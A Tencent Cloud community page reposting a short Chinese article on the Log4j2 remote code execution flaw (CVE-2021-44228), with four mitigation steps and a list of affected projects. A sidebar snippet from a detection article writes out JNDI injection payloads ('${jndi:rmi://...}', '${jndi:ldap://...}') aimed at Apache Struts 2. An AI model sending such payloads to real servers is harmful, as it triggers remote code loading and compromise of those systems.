开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

社区首页 >专栏 >Log4j-2远程代码执行漏洞解决方案

Log4j-2远程代码执行漏洞解决方案

作者头像

全栈开发日记

发布于 2022-05-13 07:17:19

发布于 2022-05-13 07:17:19

7970

举报

文章被收录于专栏：全栈开发日记全栈开发日记

漏洞简述：

漏洞是12月9日曝出来的，如果发现日志内容中包含关键字 ${}，其包含的内容会当做变量来进行替换，导致攻击者可以任意执行命令。

解决方案：

① 将版本升级至2.15.0-rc2版本

② 添加JVM参数-Dlog4j2.formatMsgNoLookups=true

③ 设置系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true

④ 创建配置文件log4j2.component.properties，设置配置项log4j2.formatMsgNoLookups=true

建议：Status2、Druid、Dubbo、ElasticSearch、Redis、Kafka等开源项目都受影响，所以你的项目如果有用到如上应用，则即使你没有使用Log4j-2也会受到影响。

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2021-12-11，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自全栈开发日记微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

评论

登录后参与评论

暂无评论

编辑精选文章

换一批

万字详解高可用架构设计

Go 开发者必备：Protocol Buffers 入门指南

10分钟带你彻底搞懂分布式链路跟踪

Log4j 史诗级漏洞来袭，速升级

安全 apache javascript java https

Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架，并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发，用来记录日志信息。

程序猿Damon

2021/12/13

6400

检测涉及CVE-2021-44228影响产品

Apache Struts 2 http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d struts.token.name='${jndi:rmi://127.0 .0.1:1099/ylbtsl}' http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/ VMWare VCenter "X-Forwarded-For

Khan安全团队

2021/12/15

9470

Apache Log4j 2远程代码执行漏洞

网络安全安全 apache javascript java

Apache Log4j是一个基于Java的日志记录工具。Log4j是几种Java日志框架之一。该项目在Apache接手后进行了代码重构，解决了框架中的架构问题并在Log4j 2中提供了一个插件架构，这使其更具扩展性。用户可以更为精确的对日志进行细粒度的控制，支持将日志信息发送到服务器、写入到文件或是发送给GUI组件等，通过定义日志信息的级别、输出格式，发送参数来对日志进行更完善的管理。

随心助手

2021/12/13

7080

Apache Log4j 2远程代码执行漏洞

Apache Log4j2 日志记录服务之远程代码执行漏洞实践与防护

apache tcp/ip 命令行工具 https http

注意：本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。

全栈工程师修炼指南

2022/09/29

9170

突发！Log4j 爆“核弹级”漏洞，Flink、Kafka等至少十多个项目受影响

安全 apache dns 网络安全

昨晚，对很多程序员来说可能是一个不眠之夜。12 月 10 日凌晨，Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开，由于 Log4j 的广泛使用，该漏洞一旦被攻击者利用会造成严重危害。

深度学习与Python

2021/12/13

1.7K0

突发！Log4j 爆“核弹级”漏洞，Flink、Kafka等至少十多个项目受影响

Log4j 曝核弹级漏洞,一行配置修复,速改

log4j 漏洞配置云安全安全

昨天（周五），一如既往的重复着每天的搬砖日常，突然又收到了公众号【阿里云应急响应】紧急更新通告；为啥说又呢？因为在10个小时之前，已经推送过一次了；

猫头虎

2024/04/07

2570

Log4j 曝核弹级漏洞,一行配置修复,速改

Log4j史诗级漏洞，我们这些小公司能做些什么？

apache 安全 https 网络安全 javascript

12月10日，看到朋友圈中已经有人在通宵修改、上线系统了。随即，又看到阿里云安全、腾讯安全部门发出的官方报告：”Apache Log4j2存在远程代码执行漏洞“，且漏洞已对外公开。

程序新视界

2021/12/13

5680

Log4j史诗级漏洞，我们这些小公司能做些什么？

分布式 | log4j2 漏洞修复方案

javascript jar java https 网络安全

爱可生 dble 团队开发成员，主要负责 dble 需求开发，故障排查和社区问题解答。少说废话，放码过来。

爱可生开源社区

2021/12/20

8110

半壁互联网江山都中招！开源软件被曝“十年最重大漏洞”，维护人竟只有3名志愿者

网络安全安全 apache 开源 javascript

就在前两天，全球知名开源日志组件Apache开源项目Log4j远程代码执行漏洞细节被公开。

大数据文摘

2021/12/15

7210

半壁互联网江山都中招！开源软件被曝“十年最重大漏洞”，维护人竟只有3名志愿者

紧急！Log4j 史诗级漏洞来袭，已引起大规模入侵，速速自查！

apache javascript 网络安全安全 java

Apache Log4j 2是一款优秀的Java日志框架。该工具重写了Log4j框架，并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发，用来记录日志信息。由于Apache Log4j 2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。

程序猿DD

2021/12/13

7250

Log4j爆核弹级漏洞，大厂中招、公司炸锅了...

apache flink java javascript lucene/solr

出处：https://www.zhihu.com/question/505025655/answer/2265086040

纯洁的微笑

2021/12/13

5870

Log4j爆核弹级漏洞，大厂中招、公司炸锅了...

核弹级漏洞——Apache Log4j 2 远程代码执行漏洞事件详情及修复方式

apache 安全 javascript java https

昨晚一直到现在技术圈可谓是沸腾了，所有人都在关注着一个漏洞——Apache Log4j 2远程代码执行。

安徽开发者圈

2021/12/15

7050

Log4j2核弹级漏洞线上修复方案！

apache 安全 javascript https 网络安全

2月9日晚，Apache Log4j2反序列化远程代码执行漏洞细节已被公开，Apache Log4j-2中存在JNDI注入漏洞，当程序将用户输入的数据进行日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。

Rookie

2021/12/13

1.4K0

核弹级log4j命令注入漏洞复现（内附工具）

apache 安全 spring shell 容器

本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集，旨在提高网络安全技术水平为目的，只做技术研究，谨遵守国家相关法律法规，请勿用于违法用途，如果您对文章内容有疑问，可以尝试加入交流群讨论或留言私信，如有侵权请联系小编处理。

网络安全自修室

2021/12/26

3.7K0

核弹级log4j命令注入漏洞复现（内附工具）

log4j2 debug_log4j原理

apache 安全 spring javascript spring boot

相信大家已经被 Log4j2 的重大漏洞刷屏了，估计有不少小伙伴此前为了修 bug 已经累趴下了。很不幸，我的小老弟小二的 Spring Boot 项目中恰好用的就是 Log4j2，版本特喵的还是 2.14.1，在这次漏洞波及的版本范围之内。

全栈程序员站长

2022/11/17

2240

【修复升级】腾讯容器安全首个发布开源 Log4j2 漏洞缓解工具

安全容器 https apache

12月9日晚，Apache Log4j2 反序列化远程代码执行漏洞（CVE-2021-44228）细节已被公开，受影响版本为 Apache Log4j 2.x< 2.15.0-rc2。

腾讯云原生

2021/12/15

9110

【修复升级】腾讯容器安全首个发布开源 Log4j2 漏洞缓解工具

如何修复Apache Log4j2远程代码执行漏洞？

Apache Log4j是一个基于Java的日志记录组件。Apache Log4j2是Log4j的升级版本，通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发，用以记录程序输入输出日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷，未经授权的攻击者利用该漏洞，可向目标服务器发送精心构造的恶意数据，触发Log4j2组件解析缺陷，实现目标服务器的任意代码执行，获得目标服务器权限。

在下科劳德-

2021/12/22

2K0

如何修复Apache Log4j2远程代码执行漏洞？

Log4j爆核弹级漏洞，公司炸锅了...

apache javascript 网络安全安全 java

昨晚一直到现在技术圈可谓是炸锅了，所有人都在关注着一个漏洞：Apache Log4j 2 远程代码执行。该漏洞一旦被攻击者利用会造成严重危害。

Java技术江湖

2021/12/13

7810

Log4j爆核弹级漏洞，公司炸锅了...

【漏洞更新情报】Apache Log4j 2 远程代码执行漏洞风险更新公告

安全 javascript apache java https

腾讯云安全运营中心监测到， Apache Log4j 2 被爆存在严重代码执行漏洞，目前官方还没有正式发布安全公告及版本，漏洞被利用可导致服务器被入侵等危害。为避免您的业务受影响，腾讯云安全建议您及时开展安全自查，如在受影响范围，请您及时进行更新修复，避免被外部攻击者入侵。漏洞详情 Apache Log4j 2是一个开源的日志记录组件，使用非常的广泛。在工程中以易用方便代替了 System.out 等打印语句，它是JAVA下最流行的日志输入工具。使用 Log4j 2 在一定场景条件下处理恶意数据时，

云鼎实验室

2021/12/10

8941

Log4j2史诗级漏洞导致JNDI注入问题探析

jndi log4j2 服务端漏洞日志

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发，用来记录日志信息。大多数情况下，开发者可能会将用户输入导致的错误信息写入日志中，比如在用户登录的时候打印一些异常信息，如xxx密码输入错误超过5次，账号被锁定；xxx账号已被锁定；xxx账号频繁异地登录。

翎野君

2023/05/12

5500

Log4j2史诗级漏洞导致JNDI注入问题探析

相关推荐

Log4j 史诗级漏洞来袭，速升级

更多 >

全栈开发日记0

LV.1

这个人很懒，什么都没有留下～

作者相关精选

换一批

加入讨论

的问答专区 >

相关课程

一站式学习中心 >

轻量应用构建训练营

轻量应用服务器

云原生降本增效实战营